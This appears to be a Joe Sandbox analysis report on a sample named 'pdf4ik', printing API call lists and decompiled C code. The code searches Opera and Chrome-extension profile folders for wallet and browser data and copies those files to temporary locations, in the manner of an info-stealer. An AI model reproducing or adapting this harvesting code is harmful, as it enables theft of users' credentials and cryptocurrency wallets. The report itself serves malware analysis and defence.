                                        0x29d9049d
                                        0x00000000
                                        0x00000000
                                        0x29d904a3
                                        0x29d904ae
                                        0x29d904b3
                                        0x29d904b8
                                        0x00000000
                                        0x00000000
                                        0x29d904c8
                                        0x00000000
                                        0x00000000
                                        0x29d904ce
                                        0x00000000
                                        0x29d903bb
                                        0x29d903bb
                                        0x29d903bb
                                        0x29d903bd
                                        0x29d903c0
                                        0x29d903cb
                                        0x29d903d1
                                        0x29d903c2
                                        0x29d903c8
                                        0x29d903c8
                                        0x29d903da
                                        0x29d903dc
                                        0x29d903dc
                                        0x29d903f4
                                        0x29d903f9
                                        0x29d903fb
                                        0x29d903fe
                                        0x29d90408
                                        0x29d906a9
                                        0x29d906a9
                                        0x29d906ae
                                        0x00000000
                                        0x00000000
                                        0x29d906b0
                                        0x29d906b3
                                        0x29d906b8
                                        0x29d9071e
                                        0x29d90725
                                        0x00000000
                                        0x29d90725
                                        0x29d906c1
                                        0x29d906fa
                                        0x29d906ff
                                        0x29d906ff
                                        0x00000000
                                        0x29d906c1
                                        0x00000000
                                        0x29d90408
                                        0x29d903b9
                                        0x29d9033d
                                        0x29d9026e
                                        0x29d90271
                                        0x29d90273
                                        0x29d90279
                                        0x29d90280
                                        0x29d90283
                                        0x29d90289
                                        0x29d9028c
                                        0x29d90290
                                        0x29d90290
                                        0x29d90292
                                        0x29d90293
                                        0x29d90293
                                        0x29d902a1
                                        0x29d902a6
                                        0x29d902ab
                                        0x29d902b0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d90702
                                        0x29d90708
                                        0x29d90718
                                        0x29d901e4
                                        0x29d901ea
                                        0x29d901ea
                                        0x29d901f5
                                        0x29d901fe
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d901fe
                                        0x00000000
                                        0x29d90718

                                        APIs
                                        • wsprintfA.USER32 ref: 29D90184
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9019B
                                        • _memset.LIBCMT ref: 29D901B5
                                        • lstrcatA.KERNEL32(?,?), ref: 29D901C5
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D901F6
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D90210
                                          • Part of subcall function 29D8FFD0: GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 29D8FFF0
                                          • Part of subcall function 29D8FFD0: GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 29D8FFFE
                                          • Part of subcall function 29D8FFD0: _malloc.LIBCMT ref: 29D90011
                                          • Part of subcall function 29D8FFD0: GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 29D9002F
                                          • Part of subcall function 29D8FFD0: GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?), ref: 29D90049
                                          • Part of subcall function 29D8FFD0: OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?), ref: 29D90050
                                          • Part of subcall function 29D8FFD0: DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?), ref: 29D9006B
                                          • Part of subcall function 29D8FFD0: MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?), ref: 29D900C4
                                          • Part of subcall function 29D8FFD0: AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?), ref: 29D900E7
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9023B
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9024D
                                        • lstrcatA.KERNEL32(?,?), ref: 29D90261
                                        • _memset.LIBCMT ref: 29D902C4
                                        • _memset.LIBCMT ref: 29D902DA
                                        • StrCmpCA.SHLWAPI(?,29DCD617), ref: 29D902E8
                                        • wsprintfA.USER32 ref: 29D90305
                                        • wsprintfA.USER32 ref: 29D90324
                                        • lstrlenA.KERNEL32(?), ref: 29D90334
                                        • _strtok_s.LIBCMT ref: 29D90356
                                        • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 29D90379
                                        • CoInitialize.OLE32 ref: 29D9038E
                                        • _strtok_s.LIBCMT ref: 29D903F4
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D90424
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9043A
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9044C
                                        • PathFindFileNameA.SHLWAPI(?), ref: 29D90459
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D90467
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D90481
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D904DB
                                        • lstrcpy.KERNEL32(?,?), ref: 29D904F1
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D90503
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D90531
                                          • Part of subcall function 29D8FFD0: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D900FC
                                          • Part of subcall function 29D8FFD0: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D90106
                                          • Part of subcall function 29D8FFD0: _free.LIBCMT ref: 29D9010D
                                        • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 29D905B1
                                        • CoInitialize.OLE32(00000000), ref: 29D905C1
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D905E8
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90604
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D90616
                                        • PathFindFileNameA.SHLWAPI(?), ref: 29D9061F
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9062D
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D90643
                                        • lstrcatA.KERNEL32(?,?), ref: 29D90517
                                          • Part of subcall function 29DA4E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,29D90797), ref: 29DA4E1A
                                          • Part of subcall function 29DA4E00: GetFileSizeEx.KERNEL32(00000000,?,?,?,29D90797), ref: 29DA4E2C
                                          • Part of subcall function 29DA4E00: CloseHandle.KERNEL32(00000000,?,?,29D90797), ref: 29DA4E37
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 29D90710
                                        • FindClose.KERNEL32(000000FF), ref: 29D90725
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D9074A
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90760
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D90772
                                        • lstrcatA.KERNEL32(?,?), ref: 29D90786
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D907A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FilePath$MatchSpec$Findlstrcpy$CloseUnothrow_t@std@@@__ehfuncinfo$??2@$Handle_memsetwsprintf$InitializeNameProcessSecurityToken_strtok_s$AccessCheckCreateCurrentDuplicateErrorFirstGenericLastMaskNextOpenSize_free_malloclstrlen
                                        • String ID: %s\%s$%s\*$*.lnk
                                        • API String ID: 626889214-1856930566
                                        • Opcode ID: ed334eb7e8018c7de6de6f02d5ab858cd7561ff484e59959e13c092176fc26a7
                                        • Instruction ID: 38ea7b639dfc99106fa6dc09d0f5615e0c571dbb38e1c29eb0851b72e7af632d
                                        • Opcode Fuzzy Hash: ed334eb7e8018c7de6de6f02d5ab858cd7561ff484e59959e13c092176fc26a7
                                        • Instruction Fuzzy Hash: B202C476950219ABDB15EF60EC84FEA7378BF54700F4085ACF509A3540EB749A86EFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9E060 Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 283stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 69%
                                        			E29D9E060(CHAR* __ebx, CHAR* __ecx, intOrPtr __edx, CHAR* _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				struct _WIN32_FIND_DATAA _v1388;
				intOrPtr _v1392;
				void* _v1396;
				CHAR* _v1400;
				CHAR* _v1404;
				CHAR* _v1408;
				intOrPtr _v1416;
				char _v1420;
				void* __edi;
				void* __esi;
				signed int _t68;
				int _t73;
				void* _t99;
				CHAR* _t101;
				CHAR* _t107;
				signed int _t112;
				void* _t120;
				intOrPtr _t122;
				void* _t123;
				intOrPtr* _t127;
				void* _t132;
				CHAR* _t137;
				CHAR* _t146;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t173;
				CHAR* _t178;
				intOrPtr _t179;
				void* _t180;
				CHAR* _t182;
				CHAR* _t183;
				void* _t184;
				signed int _t185;
				void* _t186;
				void* _t187;
				void* _t189;
				void* _t192;

				_t137 = __ebx;
				_t68 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t68 ^ _t185;
				_t182 = _a4;
				_t179 = __edx;
				_t160 =  &_v1068;
				_v1392 = __edx;
				_v1400 = _t182;
				_v1404 = _a8;
				_v1408 = __ecx;
				wsprintfA( &_v1068, "%s\\*", _t182);
				_t187 = _t186 + 0xc;
				_t73 = FindFirstFileA( &_v1068,  &_v1388);
				_v1396 = _t73;
				if(_t73 == 0xffffffff) {
					L33:
					return E29DADF46(_t73, _t137, _v8 ^ _t185, _t160, _t179, _t182);
				} else {
					do {
						 *((intOrPtr*)(_t179 + 0x1c)) =  *((intOrPtr*)(_t179 + 0x1c)) + 1;
						_push(".");
						_push( &(_v1388.cFileName));
						if( *0x29dd8550() == 0) {
							goto L31;
						}
						_push("..");
						_push( &(_v1388.cFileName));
						if( *0x29dd8550() == 0) {
							goto L31;
						}
						E29DB5640( &_v804, 0, 0x104);
						E29DB5640( &_v276, 0, 0x104);
						_t189 = _t187 + 0x18;
						lstrcatA( &_v804, _t182);
						lstrcatA( &_v804, "\\");
						lstrcatA( &_v804,  &(_v1388.cFileName));
						lstrcatA( &_v276, "\\");
						if(_a12 == 0) {
							_t146 =  *0x29dd824c; // 0x15a1c60
							lstrcatA( &_v276, _t146);
						} else {
							_t178 =  *0x29dd7b54; // 0x15a1b40
							lstrcatA( &_v276, _t178);
						}
						lstrcatA( &_v276, "\\");
						lstrcatA( &_v276, _t137);
						lstrcatA( &_v276, "\\");
						lstrcatA( &_v276, _v1404);
						lstrcatA( &_v276, "\\");
						lstrcatA( &_v276, _v1408);
						_t99 = _a16 - 1;
						if(_t99 == 0) {
							lstrcatA( &_v276, "\\");
							_t101 =  *0x29dd8088; // 0x1597178
						} else {
							_t132 = _t99 - 1;
							if(_t132 == 0) {
								lstrcatA( &_v276, "\\");
								_t101 =  *0x29dd7ee8; // 0x15a3018
								L13:
								lstrcatA( &_v276, _t101);
								L14:
								lstrcatA( &_v276, "\\");
								lstrcatA( &_v276,  &(_v1388.cFileName));
								E29DB5640( &_v540, 0, 0x104);
								_t107 =  *0x29dd8098; // 0x15a1f98
								lstrcatA( &_v540, _t107);
								_t183 = E29DADFE0( &_v540, _t179, _t182, 0x1a);
								 *_t183 = 0;
								E29DAFCE4(GetTickCount());
								_t192 = _t189 + 0x14;
								_t180 = 0x1a;
								do {
									_t112 = E29DAFCF6(_t199);
									asm("cdq");
									_push(_t112 % 0xa);
									_push(_t183);
									wsprintfA(_t183, "%s%d");
									_t192 = _t192 + 0x10;
									_t180 = _t180 - 1;
								} while (_t180 != 0);
								_t183[0x1a] = 0;
								lstrcatA( &_v540, _t183);
								CopyFileA( &_v804,  &_v540, 1);
								_t184 = CreateFileA( &_v540, 0x80000000, 3, 0, 3, 0x80, 0);
								if(_t184 != 0xffffffff) {
									_t120 =  *0x29dd836c(_t184,  &_v1420);
									_push(_t184);
									__eflags = _t120;
									if(_t120 != 0) {
										CloseHandle();
										_t122 = _v1420;
										_t155 = _v1416;
									} else {
										CloseHandle();
										_t122 = 0;
										_t155 = 0;
									}
								} else {
									_t122 = 0;
									_t155 = 0;
								}
								_t123 = E29DB75A0(_t122, _t155, 0x3e8, 0);
								_t156 =  *0x29dd826c; // 0x15a2688
								 *0x29dd82f4 =  *0x29dd82f4 + _t123;
								_push(_t156);
								_push(_t137);
								if( *0x29dd8550() == 0) {
									 *0x29dd82e0 =  *0x29dd82e0 + 1;
								}
								_t173 =  *0x29dd827c; // 0x15a2a98
								_push(_t173);
								_push(_t137);
								if( *0x29dd8550() == 0) {
									 *0x29dd82e0 =  *0x29dd82e0 + 1;
								}
								_t127 =  *((intOrPtr*)(_v1392 + 0x20));
								if(_t127 != 0) {
									__eflags =  *_t127 - 2;
									if( *_t127 == 2) {
										 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t127 + 4)),  &_v540,  &_v276, 0, 2);
									} else {
										 *0x29dd8814 = 0x80000;
									}
								} else {
									 *0x29dd8814 = 0x10000;
								}
								DeleteFileA( &_v540);
								_t182 = _v1400;
								_t179 = _v1392;
								goto L31;
							}
							_t199 = _t132 != 1;
							if(_t132 != 1) {
								goto L14;
							}
							lstrcatA( &_v276, "\\");
							_t101 =  *0x29dd7b98; // 0x15a44f0
						}
						goto L13;
						L31:
					} while (FindNextFileA(_v1396,  &_v1388) != 0);
					_t160 = _v1396;
					_t73 = FindClose(_v1396);
					goto L33;
				}
			}













































                                        0x29d9e060
                                        0x29d9e069
                                        0x29d9e070
                                        0x29d9e077
                                        0x29d9e07b
                                        0x29d9e07e
                                        0x29d9e08a
                                        0x29d9e090
                                        0x29d9e096
                                        0x29d9e09c
                                        0x29d9e0a2
                                        0x29d9e0a8
                                        0x29d9e0b9
                                        0x29d9e0bf
                                        0x29d9e0c8
                                        0x29d9e45e
                                        0x29d9e46d
                                        0x29d9e0d0
                                        0x29d9e0d0
                                        0x29d9e0d0
                                        0x29d9e0d3
                                        0x29d9e0de
                                        0x29d9e0e7
                                        0x00000000
                                        0x00000000
                                        0x29d9e0ed
                                        0x29d9e0f8
                                        0x29d9e101
                                        0x00000000
                                        0x00000000
                                        0x29d9e115
                                        0x29d9e12b
                                        0x29d9e130
                                        0x29d9e13b
                                        0x29d9e14d
                                        0x29d9e161
                                        0x29d9e173
                                        0x29d9e17d
                                        0x29d9e18f
                                        0x29d9e19d
                                        0x29d9e17f
                                        0x29d9e17f
                                        0x29d9e19d
                                        0x29d9e19d
                                        0x29d9e1af
                                        0x29d9e1bd
                                        0x29d9e1cf
                                        0x29d9e1e3
                                        0x29d9e1f5
                                        0x29d9e209
                                        0x29d9e212
                                        0x29d9e213
                                        0x29d9e259
                                        0x29d9e25f
                                        0x29d9e215
                                        0x29d9e215
                                        0x29d9e216
                                        0x29d9e240
                                        0x29d9e246
                                        0x29d9e264
                                        0x29d9e26c
                                        0x29d9e272
                                        0x29d9e27e
                                        0x29d9e292
                                        0x29d9e2a6
                                        0x29d9e2ab
                                        0x29d9e2bb
                                        0x29d9e2c8
                                        0x29d9e2cd
                                        0x29d9e2d7
                                        0x29d9e2dc
                                        0x29d9e2df
                                        0x29d9e2e4
                                        0x29d9e2e4
                                        0x29d9e2e9
                                        0x29d9e2f1
                                        0x29d9e2f2
                                        0x29d9e2f9
                                        0x29d9e2ff
                                        0x29d9e302
                                        0x29d9e302
                                        0x29d9e30d
                                        0x29d9e311
                                        0x29d9e32b
                                        0x29d9e350
                                        0x29d9e355
                                        0x29d9e365
                                        0x29d9e36b
                                        0x29d9e36c
                                        0x29d9e36e
                                        0x29d9e37c
                                        0x29d9e382
                                        0x29d9e388
                                        0x29d9e370
                                        0x29d9e370
                                        0x29d9e376
                                        0x29d9e378
                                        0x29d9e378
                                        0x29d9e357
                                        0x29d9e357
                                        0x29d9e359
                                        0x29d9e359
                                        0x29d9e397
                                        0x29d9e39c
                                        0x29d9e3a2
                                        0x29d9e3a8
                                        0x29d9e3a9
                                        0x29d9e3b2
                                        0x29d9e3b4
                                        0x29d9e3b4
                                        0x29d9e3ba
                                        0x29d9e3c0
                                        0x29d9e3c1
                                        0x29d9e3ca
                                        0x29d9e3cc
                                        0x29d9e3cc
                                        0x29d9e3d8
                                        0x29d9e3dd
                                        0x29d9e3eb
                                        0x29d9e3ee
                                        0x29d9e417
                                        0x29d9e3f0
                                        0x29d9e3f0
                                        0x29d9e3f0
                                        0x29d9e3df
                                        0x29d9e3df
                                        0x29d9e3df
                                        0x29d9e423
                                        0x29d9e429
                                        0x29d9e42f
                                        0x00000000
                                        0x29d9e42f
                                        0x29d9e218
                                        0x29d9e219
                                        0x00000000
                                        0x00000000
                                        0x29d9e227
                                        0x29d9e22d
                                        0x29d9e22d
                                        0x00000000
                                        0x29d9e435
                                        0x29d9e449
                                        0x29d9e451
                                        0x29d9e458
                                        0x00000000
                                        0x29d9e458

                                        APIs
                                        • wsprintfA.USER32 ref: 29D9E0A2
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9E0B9
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9E0DF
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9E0F9
                                        • _memset.LIBCMT ref: 29D9E115
                                        • _memset.LIBCMT ref: 29D9E12B
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E13B
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E14D
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E161
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E173
                                        • lstrcatA.KERNEL32(?,015A1C60), ref: 29D9E19D
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1AF
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E1BD
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1CF
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E1E3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1F5
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E209
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E227
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E240
                                        • lstrcatA.KERNEL32(?,01597178), ref: 29D9E26C
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E27E
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E292
                                        • _memset.LIBCMT ref: 29D9E2A6
                                        • lstrcatA.KERNEL32(?,015A1F98), ref: 29D9E2BB
                                        • _malloc.LIBCMT ref: 29D9E2C3
                                        • GetTickCount.KERNEL32 ref: 29D9E2D0
                                        • _rand.LIBCMT ref: 29D9E2E4
                                        • wsprintfA.USER32 ref: 29D9E2F9
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9E311
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9E32B
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 29D9E34A
                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 29D9E365
                                        • CloseHandle.KERNEL32(00000000), ref: 29D9E370
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D9E397
                                        • StrCmpCA.SHLWAPI(?,015A2688,?,?,000003E8,00000000), ref: 29D9E3AA
                                        • StrCmpCA.SHLWAPI(?,015A2A98), ref: 29D9E3C2
                                        • DeleteFileA.KERNEL32(?,?,00000000,00000002), ref: 29D9E423
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D9E443
                                        • FindClose.KERNEL32(?), ref: 29D9E458
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Find_memset$Closewsprintf$CopyCountCreateDeleteFirstHandleNextSizeTickUnothrow_t@std@@@__ehfuncinfo$??2@_malloc_rand
                                        • String ID: %s%d$%s\*
                                        • API String ID: 24648945-989840649
                                        • Opcode ID: 6f7e2aa30287b2ee7f2f462e166ce30c9df7f4e242242fff4c44b9878b7d4f0a
                                        • Instruction ID: e1023048dd050bd2555e669ac44965ebd8bd43d059e517fee4b90e15ca0239fc
                                        • Opcode Fuzzy Hash: 6f7e2aa30287b2ee7f2f462e166ce30c9df7f4e242242fff4c44b9878b7d4f0a
                                        • Instruction Fuzzy Hash: ACB18172940218ABD715EBA0DC84FEA7778BB58701F44868DF609D3140EB749A85EFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9E470 Relevance: 72.1, APIs: 34, Strings: 7, Instructions: 368filestringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 87%
                                        			E29D9E470(void* __ecx, CHAR* __edx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				char _v1332;
				char _v1596;
				char _v1860;
				char _v2124;
				struct _WIN32_FIND_DATAA _v2444;
				CHAR* _v2448;
				void* _v2452;
				CHAR* _v2456;
				void* _v2460;
				void* __ebx;
				signed int _t114;
				signed char _t169;
				signed char _t173;
				signed char _t176;
				intOrPtr _t179;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t249;
				void* _t250;
				signed int _t251;
				void* _t252;
				void* _t253;
				void* _t259;

				_t250 = __esi;
				_t249 = __edi;
				_t114 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t114 ^ _t251;
				_t179 = _a12;
				_v2448 = _a4;
				_v2452 = __ecx;
				_v2456 = __edx;
				wsprintfA( &_v2124, "%s\\*.*", __esi);
				_t253 = _t252 + 0xc;
				if(_t179 != 0) {
					E29DB5640( &_v276, 0, 0x104);
					_t180 = _t179 - 1;
					if(_t180 == 0) {
						lstrcatA( &_v276, "Opera Stable");
						goto L26;
					} else {
						_t180 = _t180 - 1;
						if(_t180 == 0) {
							lstrcatA( &_v276, "Opera GX Stable");
							goto L26;
						} else {
							if(_t180 == 0) {
								lstrcatA( &_v276, "Opera Crypto Stable");
								L26:
							}
						}
					}
					_t185 =  *0x29dd8088; // 0x1597178
					wsprintfA( &_v1860, "%s\\%s\\%s\\%s", _t250,  &_v276, _t185, _t249);
					_t186 =  *0x29dd7a9c; // 0x15a1b20
					wsprintfA( &_v804, "%s\\%s",  &_v1860, _t186);
					_t187 =  *0x29dd7ee8; // 0x15a3018
					wsprintfA( &_v1332, "%s\\%s\\%s\\%s", _t250,  &_v276, _t187, _t249);
					_t188 =  *0x29dd7a9c; // 0x15a1b20
					wsprintfA( &_v540, "%s\\%s",  &_v1332, _t188);
					_t189 =  *0x29dd7b98; // 0x15a44f0
					wsprintfA( &_v1068, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t250,  &_v276, _t189, _t249);
					_t190 =  *0x29dd7a9c; // 0x15a1b20
					_t227 =  &_v1068;
					_t134 = wsprintfA( &_v1596, "%s\\%s",  &_v1068, _t190);
					if(_a16 != 0) {
						_t134 = GetFileAttributesA( &_v804);
						if(_t134 != 0xffffffff && (_t134 & 0x00000010) == 0) {
							_t180 = _v2452;
							_t227 = _v2448;
							_t134 = E29D9E060(_v2452,  &_v276, _v2448,  &_v1860, _v2456, _a8, 1);
						}
					}
					if(_a20 != 0) {
						_t227 =  &_v540;
						_t134 = GetFileAttributesA( &_v540);
						if(_t134 != 0xffffffff && (_t134 & 0x00000010) == 0) {
							_t180 = _v2452;
							_t227 = _v2448;
							_t134 = E29D9E060(_v2452,  &_v276, _v2448,  &_v1332, _v2456, _a8, 2);
						}
					}
					if(_a24 != 0) {
						_t134 = GetFileAttributesA( &_v1596);
						if(_t134 != 0xffffffff && (_t134 & 0x00000010) == 0) {
							_t180 = _v2452;
							_t227 = _v2448;
							_t134 = E29D9E060(_v2452,  &_v276, _v2448,  &_v1068, _v2456, _a8, 3);
						}
					}
					goto L39;
				} else {
					_t227 =  &_v2124;
					_t180 = FindFirstFileA( &_v2124,  &_v2444);
					_v2460 = _t180;
					if(_t180 == 0xffffffff) {
						L39:
						return E29DADF46(_t134, _t180, _v8 ^ _t251, _t227, _t249, _t250);
					} else {
						do {
							_push(".");
							_push( &(_v2444.cFileName));
							if( *0x29dd8550() != 0) {
								_push("..");
								_push( &(_v2444.cFileName));
								if( *0x29dd8550() != 0) {
									E29DB5640( &_v276, 0, 0x104);
									lstrcatA( &_v276,  &(_v2444.cFileName));
									_t234 =  *0x29dd8088; // 0x1597178
									wsprintfA( &_v1596, "%s\\%s\\%s\\%s", _t250,  &_v276, _t234, _t249);
									_t235 =  *0x29dd7a9c; // 0x15a1b20
									wsprintfA( &_v1068, "%s\\%s",  &_v1596, _t235);
									_t236 =  *0x29dd7ee8; // 0x15a3018
									wsprintfA( &_v540, "%s\\%s\\%s\\%s", _t250,  &_v276, _t236, _t249);
									_t237 =  *0x29dd7a9c; // 0x15a1b20
									wsprintfA( &_v1332, "%s\\%s",  &_v540, _t237);
									_t238 =  *0x29dd7b98; // 0x15a44f0
									wsprintfA( &_v804, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t250,  &_v276, _t238, _t249);
									_t239 =  *0x29dd7a9c; // 0x15a1b20
									wsprintfA( &_v1860, "%s\\%s",  &_v804, _t239);
									_t259 = _t253 + 0x84;
									if(_a16 != 0) {
										_t176 = GetFileAttributesA( &_v1068);
										if(_t176 != 0xffffffff && (_t176 & 0x00000010) == 0) {
											E29D9E060(_v2452,  &_v276, _v2448,  &_v1596, _v2456, _a8, 1);
										}
									}
									if(_a20 != 0) {
										_t173 = GetFileAttributesA( &_v1332);
										if(_t173 != 0xffffffff && (_t173 & 0x00000010) == 0) {
											E29D9E060(_v2452,  &_v276, _v2448,  &_v540, _v2456, _a8, 2);
										}
									}
									if(_a24 != 0) {
										_t169 = GetFileAttributesA( &_v1860);
										if(_t169 != 0xffffffff && (_t169 & 0x00000010) == 0) {
											E29D9E060(_v2452,  &_v276, _v2448,  &_v804, _v2456, _a8, 3);
										}
									}
									E29DB5640( &_v1596, 0, 0x104);
									E29DB5640( &_v1068, 0, 0x104);
									E29DB5640( &_v540, 0, 0x104);
									E29DB5640( &_v1332, 0, 0x104);
									E29DB5640( &_v804, 0, 0x104);
									E29DB5640( &_v1860, 0, 0x104);
									_t180 = _v2460;
									_t253 = _t259 + 0x48;
								}
							}
						} while (FindNextFileA(_t180,  &_v2444) != 0);
						return E29DADF46(FindClose(_t180), _t180, _v8 ^ _t251,  &_v2444, _t249, _t250);
					}
				}
			}









































                                        0x29d9e470
                                        0x29d9e470
                                        0x29d9e479
                                        0x29d9e480
                                        0x29d9e487
                                        0x29d9e48b
                                        0x29d9e49d
                                        0x29d9e4a3
                                        0x29d9e4a9
                                        0x29d9e4af
                                        0x29d9e4b4
                                        0x29d9e7a5
                                        0x29d9e7ad
                                        0x29d9e7ae
                                        0x29d9e7de
                                        0x00000000
                                        0x29d9e7b0
                                        0x29d9e7b0
                                        0x29d9e7b1
                                        0x29d9e7de
                                        0x00000000
                                        0x29d9e7b3
                                        0x29d9e7b4
                                        0x29d9e7de
                                        0x29d9e7de
                                        0x29d9e7de
                                        0x29d9e7b4
                                        0x29d9e7b1
                                        0x29d9e7e4
                                        0x29d9e800
                                        0x29d9e806
                                        0x29d9e820
                                        0x29d9e826
                                        0x29d9e842
                                        0x29d9e848
                                        0x29d9e865
                                        0x29d9e86b
                                        0x29d9e887
                                        0x29d9e88d
                                        0x29d9e894
                                        0x29d9e8a7
                                        0x29d9e8b4
                                        0x29d9e8bd
                                        0x29d9e8c6
                                        0x29d9e8d5
                                        0x29d9e8de
                                        0x29d9e8f2
                                        0x29d9e8f2
                                        0x29d9e8c6
                                        0x29d9e8fb
                                        0x29d9e8fd
                                        0x29d9e904
                                        0x29d9e90d
                                        0x29d9e91c
                                        0x29d9e92d
                                        0x29d9e939
                                        0x29d9e939
                                        0x29d9e90d
                                        0x29d9e942
                                        0x29d9e94b
                                        0x29d9e954
                                        0x29d9e963
                                        0x29d9e96d
                                        0x29d9e980
                                        0x29d9e980
                                        0x29d9e954
                                        0x00000000
                                        0x29d9e4ba
                                        0x29d9e4c1
                                        0x29d9e4ce
                                        0x29d9e4d0
                                        0x29d9e4d9
                                        0x29d9e985
                                        0x29d9e993
                                        0x29d9e4e0
                                        0x29d9e4e0
                                        0x29d9e4e0
                                        0x29d9e4eb
                                        0x29d9e4f4
                                        0x29d9e4fa
                                        0x29d9e505
                                        0x29d9e50e
                                        0x29d9e522
                                        0x29d9e538
                                        0x29d9e53e
                                        0x29d9e55a
                                        0x29d9e560
                                        0x29d9e57a
                                        0x29d9e580
                                        0x29d9e59c
                                        0x29d9e5a2
                                        0x29d9e5bf
                                        0x29d9e5c5
                                        0x29d9e5e1
                                        0x29d9e5e7
                                        0x29d9e601
                                        0x29d9e607
                                        0x29d9e60e
                                        0x29d9e617
                                        0x29d9e620
                                        0x29d9e64c
                                        0x29d9e64c
                                        0x29d9e620
                                        0x29d9e655
                                        0x29d9e65e
                                        0x29d9e667
                                        0x29d9e693
                                        0x29d9e693
